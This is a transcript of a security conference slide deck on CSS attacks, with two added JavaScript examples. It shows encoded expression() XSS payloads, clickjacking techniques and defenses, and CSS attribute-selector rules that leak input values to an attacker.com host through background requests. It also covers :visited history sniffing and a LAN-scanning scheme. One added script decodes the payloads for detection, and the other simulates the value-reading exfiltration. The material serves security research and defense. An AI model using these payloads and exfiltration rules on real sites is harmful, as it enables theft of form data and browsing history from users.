Presentation on theme: "The Sexy Assassin Tactical Exploitation using CSS."— Presentation transcript:

1 The Sexy Assassin Tactical Exploitation using CSS

2 Presentation Overview
- Old attacks
- New research
- New attacks

3 Old Attacks - Reloaded: known attacks using CSS

4 XSS using CSS - Impact
- Session riding/hijacking
- Stealing page content
- Exploiting buffer/heap overflow and other memory-corruption vulnerabilities in the browser
- All other XSS threats

5 Expression XSS
- CSS values can be escaped with backslashes, and then further encoded with HTML hex/decimal character references.
- Following the CSS specification, the (IE-only) expression() value can be written entirely with hex escapes; the property name is irrelevant, IE evaluates the expression anyway:
<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28 \61\6c\65\72\74\28\31\29\29>
- The CSS parser reads this as xss:expression(alert(1)).

6 Expression XSS continued
The previous vector can additionally be HTML entity-encoded (numeric references, here without the trailing semicolons; the HTML parser decodes them before the CSS parser ever sees the backslashes):
<div style=xss:&#92&#54&#53&#92&#55&#56&#92&#55&#48&#92&#55&#50&#92&#54&#53&#92&#55&#51&#92&#55&#51&#92&#54&#57&#92&#54&#102&#92&#54&#101&#92&#50&#56&#92&#54&#49&#92&#54&#99&#92&#54&#53&#92&#55&#50&#92&#55&#52&#92&#50&#56&#92&#51&#49&#92&#50&#57&#92&#50&#57>

7 External style sheet tricks
- Expressions can also be executed from external style sheets.
- The import itself can be encoded: @\69\6d\70\6f\72\74 'xss.css'; is parsed as @import 'xss.css';
- The content of the imported sheet can be encoded as well, e.g. @import 'utf.css'; where utf.css declares its own charset (next slide).

8 UTF-7 Expression
UTF-7 encoded style sheet:
@charset "UTF-7";
+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-
which the browser decodes to:
* {xss:expression(alert(1))}
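As an added example (not code from the slides), the JavaScript below undoes the three encodings shown on slides 5 through 8 the way a browser does, which is what a WAF rule or a log-analysis script has to do before it can match on expression(. It implements the CSS 2.1 escape rule (one to six hex digits plus one optional trailing whitespace character that is swallowed), HTML numeric character references with or without the trailing semicolon, and UTF-7 shift blocks. The sample vectors are copied from the slides; the function names and the detection regex are my own.

```javascript
'use strict';
// Added example: decoders for the encodings on slides 5-8. Not the presenters'
// code. The three sample payloads below are copied from the slides.

// HTML numeric character references, decimal or hex, with or without the ';'
// (HTML parsers accept both, which is why &#92&#54&#53 works in an attribute).
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return String.fromCodePoint(cp);
  });
}

// CSS backslash escapes (CSS 2.1 section 4.1.3): 1-6 hex digits followed by one
// optional whitespace character that is consumed; any other escaped character
// stands for itself. Zero and out-of-range code points become U+FFFD.
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-f]{1,6})(?:\r\n|[ \t\r\n\f])?|\\([\s\S])/gi, (_, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp === 0 || cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
  });
}

// UTF-7 shift blocks: '+<base64 of UTF-16BE>-' ; a bare '+-' is a literal '+'.
function decodeUtf7(s) {
  return s.replace(/\+([A-Za-z0-9+/]*)-?/g, (_, b64) => {
    if (b64 === '') return '+';
    const bytes = Buffer.from(b64, 'base64');
    // Drop a trailing odd byte (leftover padding bits), then read UTF-16BE.
    return bytes.subarray(0, bytes.length & ~1).swap16().toString('utf16le');
  });
}

// A style attribute is entity-decoded by the HTML parser first and
// escape-decoded by the CSS parser second; normalize in that order.
function normalizeStyle(value) {
  return decodeCssEscapes(decodeNumericEntities(value));
}

// Detection sink check (my regex, not from the slides).
const EXPRESSION_RE = /expression\s*\(/i;
function containsExpression(value) {
  return EXPRESSION_RE.test(normalizeStyle(value));
}

// Sample payloads copied from slides 5, 6 and 8.
const HEX_VECTOR = String.raw`xss:\65\78\70\72\65\73\73\69\6f\6e\28 \61\6c\65\72\74\28\31\29\29`;
const ENTITY_VECTOR = 'xss:&#92&#54&#53&#92&#55&#56&#92&#55&#48&#92&#55&#50&#92&#54&#53&#92&#55&#51'
  + '&#92&#55&#51&#92&#54&#57&#92&#54&#102&#92&#54&#101&#92&#50&#56&#92&#54&#49&#92&#54&#99'
  + '&#92&#54&#53&#92&#55&#50&#92&#55&#52&#92&#50&#56&#92&#51&#49&#92&#50&#57&#92&#50&#57';
const UTF7_SHEET = '+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0-';

console.log(normalizeStyle(HEX_VECTOR));     // xss:expression(alert(1))
console.log(normalizeStyle(ENTITY_VECTOR));  // xss:expression(alert(1))
console.log(decodeUtf7(UTF7_SHEET));         // * {xss:expression(alert(1))}
console.log(containsExpression(ENTITY_VECTOR)); // true
```

The order in normalizeStyle matters: decoding escapes before entities would leave the entity vector untouched, because the backslashes only exist after the &#92 references have been resolved.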

9 CSS Overlays (clickjacking)
Definition: convincing the user to click on something, and using that click to do something else (bad things).

10 CSS Overlays description
[Diagram: the attacker page shows a "Click here to continue" button; the original web page is loaded in an iframe positioned so that its real button sits under the decoy.]

11 CSS Overlays advanced attacks
- Multiple nested iframes
- Using offsets to expose only a piece of the target site
- No opacity needed: solid white div regions cover the rest
- Single sign-on services are vulnerable
- Combined JavaScript and CSS tricks to intercept a click; impossible to know until it's too late

12 CSS Overlays advanced attacks - Verisign case study
The iframe performs a login request on the relying-party site (ficlets.com):
<form action="http://ficlets.com/signin/openid.signin" method="post" id="openid-form" target="iframe">
<input type="hidden" name="openid" id="openid-url" class="text-field" value="openidtester.pip.verisignlabs.com" />
ficlets.com then sends the iframe on to the Verisign OpenID provider.

13 CSS Overlays advanced attacks Verisign case study cont. OpenID provider (Verisign) is now in our iframe

14 CSS Overlays advanced attacks Verisign case study cont. Using multiple iframes and div offsets we can cover the other areas with solid colours and position the target area wherever we like

15 CSS Overlays advanced attacks - Verisign case study cont.
- Opacity can be used, but solid fills make the attack harder to protect against at the browser level.
- Referer checking can neuter the attack, but the header is not always available, it is not implemented on most sites, and it can be faked or stripped.
- David Ross' idea: a "clickjacket", a user (accessibility) style sheet that uses expressions to display a hover popup that appears above any other element.

16 CSS Overlays Workarounds
- Frame-busting scripts (iframe-breaker): in some browsers (IE) JavaScript can be disabled inside the frame, e.g. with the security="restricted" iframe attribute (iframe-breaker-breaker).
- NoScript: opacity disabled on remote iframes and embedded content. CSS overlays that don't require opacity still work.
- Michal Zalewski: deliver the click only if the frame is not obstructed. Some no-opacity overlay attacks still work against this.
- Mozilla: delayed disabled buttons. Still exploitable.
- David Ross: X-I-Don't-Wanna-Be-Iframed-Please (the opt-out response header that shipped as X-Frame-Options). Old browsers and websites remain vulnerable.

17 Exploiting clickjacking defenses
- The iframe's hover state can be intercepted.
- There is no way for the user to tell they are hovering over an external site.
- The click can then be transferred to the iframe when the user clicks.

18 Exploiting clickjacking defenses
- An image intercepts the hover state.
- The image is hidden onmousedown.
- The click is transferred to the iframe: the mousedown landed on the image, but by mouseup the pointer is over the iframe, so the framed page receives the click.

19 More clickjacking defenses
My extension to David Ross' click jacket: the "full metal click jacket". A user (accessibility) style sheet overrides the browser defaults with !important:
iframe,frame,object,applet {
  border:1px solid #000 !important;
  visibility:visible !important;
  opacity: 1 !important;
  filter: alpha(opacity=100) !important;
  position:absolute !important;
  float:none !important;
  overflow:auto !important;
  ....
}

20 More clickjacking defenses
Advantages:
- Object styles are locked
- The user can clearly see that it is an external site
- JavaScript and CSS modification of styles has no effect
Disadvantages:
- Manuel Caballero hacked it :) The parent element still allows opacity modification.

21 More clickjacking defenses
Browser-level CSS locks could prevent attacks.
Advantages:
- Hard for an attacker to exploit if external objects are clearly visible and above everything else
Disadvantages:
- Designers would complain about limiting design ideas
- External objects would look ugly
- Could break existing sites

22 New Research Algorithms

23 Arithmetics & Memory (demos: http://p42.us/css)
How: element:condition { action; }
- element: anything
- condition: :visited, :active, :hover, :selected, etc.
- action: background (remote request), display, opacity, visibility

24 Loops (demos: http://p42.us/css)
Forcing a style recalculation:
- META refreshes
- -moz-binding: * { -moz-binding:url("remote-req#id") }
- WebKit's proposed CSS-based animations (not very useful): @keyframes {}

25 Server Side Interaction (demos: http://p42.us/css)
- HTML+XML data loading (IE only or Firefox only): MSIE HTC files, XML DATAFLD, -moz-binding
- Meta refreshes + stylesheet update (not cross-browser)
- Async stylesheet loading (doesn't work in strict mode): @import "//url1"; @import "//url2";
- Multiple iframe loading (works everywhere)

26 New attacks Attacks possible thanks to the "theory"

27 CSS HTML Attribute Reader: how to read HTML attributes using CSS, without JavaScript.

28 CSS HTML Attribute Reader
CSS3 attribute selectors, for matching:
- input {} matches all inputs.
- input[type] {} matches all inputs with a type attribute.
- input[type="password"] {} matches all inputs of type password.

29 CSS HTML Attribute Reader
More CSS3 attribute selectors:
- input[type*="swor"] {} matches all inputs whose type attribute contains "swor" (anywhere).
- input[type^="pass"] {} matches all inputs whose type attribute starts with "pass".
- input[type$="word"] {} matches all inputs whose type attribute ends with "word".

30 CSS HTML Attribute Reader
Attempt to read an attribute with the [=] selector, with help of the [*=] selector. First calculate the range of characters present in the value, one rule per candidate character (\x10 here stands for the character with that code, written as a CSS hex escape); each matching rule triggers a background request that tells the attacker which character is present:
input[value*="\x10"]{ background:url("//attacker.com/?h=\x10"); }
... 111 different variations ...
input[value*="\x7F"]{ background:url("//attacker.com/?h=\x7F"); }

31 CSS HTML Attribute Reader – Try 3
To find the first letter, assuming from the previous step that the range is [uiopasdf]:
input[value^="u"]{ background:url("//attacker.com/?s=u"); }
... and so on, 8 questions: u,i,o,p,a,s,d,f ...
input[value^="f"]{ background:url("//attacker.com/?s=f"); }

32 CSS HTML Attribute Reader – Try 3
Once we have found the first char (let's say it was d) we continue with [uiopasf]:
input[value^="du"]{ background:url("//attacker.com/?s=du"); }
... and so on, 7 questions: u,i,o,p,a,s,f ...
input[value^="df"]{ background:url("//attacker.com/?s=df"); }

33 CSS HTML Attribute Reader – Try 3
And so on. If we assume a known attribute length but allow for repeated characters, this costs 111 + N^2 CSS rules: 111 range probes, then for each of the N positions one rule per character of the detected range, which has at most N distinct characters.
- Worst case for 8 chars: 175 CSS rules
- Worst case for 50 chars: 2,611 CSS rules

34 CSS HTML Attribute Reader
We can optimize this further, but at the implementation level. First, probing the prefix with [^=] and the suffix with [$=] in the same stylesheet resolves two positions per round, halving the number of round trips.

35 CSS HTML Attribute Reader
- Detect the range
- Detect the first and eighth char
- Detect the second and seventh char
- Detect the third and sixth char
- Detect the fourth and fifth char
- Confirm we have the correct string

36 CSS HTML Attribute Reader
Demo: async stylesheet load attribute reader (read the contents of a text field without JS): http://eaea.sirdarckcat.net/cssar/
Parallel discovery by Stefano Di Paola (WiSec) with 111*N complexity (888 rules for 8 chars): http://www.wisec.it/
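As an added example (not the presenters' code or demo), the following JavaScript simulates the whole attribute-reading procedure of slides 30 through 35: range detection with [*=], prefix extension with [^=], the two-sided variant that also grows a suffix with [$=], and the final [=] confirmation. The victim browser is replaced by selectorMatches(), which answers exactly what the attacker would otherwise learn from a background request hitting the log; attacker.example is a placeholder host, and the rule and round counters are mine. Running it on an 8-character value with distinct characters reproduces the worst-case figure quoted on slide 33.

```javascript
'use strict';
// Added example: simulation of the CSS attribute reader on slides 30-35.
// Not the presenters' code. The browser is simulated by selectorMatches() and
// "attacker.example" stands in for the attacker's logging host.

// Characters tried in the range-detection step: \x10..\x7E, 111 of them,
// which is the count the slides give.
const CANDIDATES = Array.from({ length: 0x7f - 0x10 },
  (_, i) => String.fromCharCode(0x10 + i));

// Hex-escape one character for a CSS string. The trailing space terminates
// the escape so that the next character cannot be read as a hex digit.
function cssEscape(ch) {
  return '\\' + ch.charCodeAt(0).toString(16) + ' ';
}

// One probe rule: it fires (issues the background request) only when the
// attribute selector matches, and the request leaks the probe in the query.
function probeRule(op, needle) {
  const sel = `input[value${op}"${Array.from(needle, cssEscape).join('')}"]`;
  const url = `//attacker.example/?op=${encodeURIComponent(op)}&v=${encodeURIComponent(needle)}`;
  return `${sel}{background:url("${url}")}`;
}

// Stand-in for the browser evaluating a selector against the real value.
// In the live attack this answer is only visible as a hit in the server log.
function selectorMatches(value, op, needle) {
  if (needle === '') return false;          // an empty needle matches nothing in CSS3
  switch (op) {
    case '*=': return value.includes(needle);
    case '^=': return value.startsWith(needle);
    case '$=': return value.endsWith(needle);
    case '=':  return value === needle;
  }
  throw new Error('unsupported operator ' + op);
}

// Send one stylesheet: every probe of the round is emitted (the sheet is
// static, so all rules count) and the probes whose request arrived are returned.
function runRound(sheet, secret, op, needles) {
  const hits = [];
  for (const n of needles) {
    sheet.push(probeRule(op, n));
    if (selectorMatches(secret, op, n)) hits.push(n);
  }
  return hits;
}

// Read an attribute of known length (the slides assume the length is known).
// twoSided=true also grows a suffix with [$=] in the same round as the [^=]
// prefix probe, which halves the number of round trips but not the rule count.
function readAttribute(secret, length, twoSided = false) {
  const sheet = [];
  let rounds = 1;
  const alphabet = runRound(sheet, secret, '*=', CANDIDATES);   // step 1: range
  let prefix = '', suffix = '';
  while (prefix.length + suffix.length < length) {
    rounds++;
    const [p] = runRound(sheet, secret, '^=', alphabet.map(c => prefix + c));
    if (p === undefined) throw new Error('no prefix probe fired: character outside the candidate range?');
    prefix = p;
    if (twoSided && prefix.length + suffix.length < length) {
      const [s] = runRound(sheet, secret, '$=', alphabet.map(c => c + suffix));
      if (s === undefined) throw new Error('no suffix probe fired');
      suffix = s;
    }
  }
  const guess = prefix + suffix;
  const confirmed = runRound(sheet, secret, '=', [guess]).length === 1;  // final check
  return { value: guess, confirmed, rules: sheet.length, rounds, sheet };
}

// Constructed sample: 8 distinct characters, the worst case the slides quote
// (111 range probes + 8*8 position probes = 175 rules, plus one confirm rule).
const result = readAttribute('hgfedcba', 8, true);
console.log(result.value, result.confirmed, result.rules, result.rounds);
// hgfedcba true 176 5
console.log(result.sheet[0]);
// input[value*="\10 "]{background:url("//attacker.example/?op=*%3D&v=%10")}
```

With twoSided=false the same value takes nine rounds (one for the range, one per character) and the same 176 rules; with twoSided=true it takes five, matching the pairing on slide 35. A character outside the candidate range is never found, which is why the range step is the one to widen when reading values that may contain non-ASCII.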

37 -1day (0Day-1) - Cross Site Styling
HTML5 describes seamless iframes, which inherit all styles of the parent document, cross-origin. HTML attribute reading would therefore become a vulnerability in a not-yet-implemented standard: CSS would read content cross-origin with a single @import "exploit"; (The seamless attribute was later dropped from the HTML specification.) Call to Microsoft's people in the W3C HTML5 WG: stop this! Make it same-origin only ;)

38 CSS History Hacks: attacks based on CSS being able to read the browser's history through :visited.

39 Visited boolean
Cross-browser:
a:visited { background:url(//visited) }
a:not(:visited) { background:url(//not-visited) }
Impact: privacy.
Counter-measures: Firefox: SafeHistory addon; IE: disable history.
Demo: http://ha.ckers.org/weird/CSS-history.cgi
(Caveat: browsers have since restricted :visited styling to colours and report the unvisited style to scripts, so this background-request oracle no longer works in current browsers.)

40 CSS LAN Scanner
PoC: CSS LAN Scanner. How it works: error pages don't create a history entry, but a valid website is marked as visited. The scanner simply loads a lot of LAN IPs in iframes and checks which of them were marked as visited.

41 CSS LAN Scanner
[Diagram, repeated on slides 41-46: attacker.com, the victim, and the LAN intranet with a private web service at 10.3.22.111 and a configuration router at 192.168.1.254.]
The victim visits attacker.com.

42 CSS LAN Scanner
attacker.com tries to open a lot of local IP addresses in iframes; most will fail.

43 CSS LAN Scanner
attacker.com then asks which of those URLs appear as visited, and so which IPs are up.

44 CSS LAN Scanner
The victim's browser reports the visited IPs back to the attacker.

45 CSS LAN Scanner
attacker.com then tries to guess the service on those IPs based on ports and, if necessary, the content of remote stylesheets.

46 CSS LAN Scanner
attacker.com then sends CSRF attacks against the software detected behind the LAN.

47 CSSH - CSS Stealing Some History: history crawler + navigation monitoring!

48 CSSH - History Crawler
[Diagram: attacker.com and the victim; a list of candidate sites: digg.com, twitter.com, slashdot.org, hi5.com, myspace, google news, msn.com, del.icio.us, live.com, sla.ckers.org, Redtube, facebook.]
attacker.com shows the victim a lot of possible websites that the user may have visited.

49 CSSH - History Crawler
The victim's browser responds to the attacker with the websites that were visited.

50 CSSH - History Crawler
The attacker fetches the links of those websites (Link #1 ... Link #6) and asks which ones are visited. The victim responds, and the exploit asks again, endlessly.

51 CSSH - History Crawler
This way we can effectively crawl the commonly visited websites of a user. The privacy implications of this are huge. This attack is not a secret; it was described in Mozilla's bug tracker by Paul Stone: https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c78

52 CSSH - Navigation Monitoring What if... We could detect in real-time the navigation of a user using our history crawler? Might this be possible? Yes

53 CSSH - Navigation Monitoring
The victim visits attacker.com.

54 CSSH - Navigation Monitoring
attacker.com sends the exploit to the user and opens digg.com.

55 CSSH - Navigation Monitoring
The exploit detects that digg.com was visited, so it alerts attacker.com, and attacker.com fetches the links on digg.com.

56 CSSH - Navigation Monitoring
Then the attacker updates the exploit, which starts asking whether any of those links are visited.

57 CSSH - Navigation Monitoring
When the user finally clicks on a link (cnn.com), the exploit detects it and alerts attacker.com.

58 CSSH - Navigation Monitoring
attacker.com fetches all links on cnn.com and updates the exploit, asking whether they were visited.

59 CSSH - Navigation Monitoring
Repeat the above steps indefinitely.

60 CSSH - Navigation Monitoring Public Demo : http://eaea.sirdarckcat.net/cssh-mon/ Cross-browser.

61 Thanks We would like to thank: Bluehat team, David Ross, Robert Hansen, Jeremiah Grossman, Giorgio Maone, Alex K, David Lenoe (Adobe PSIRT), Google Sec. Team, Stefano DiPaola, and everyone else that assisted in any way our research.

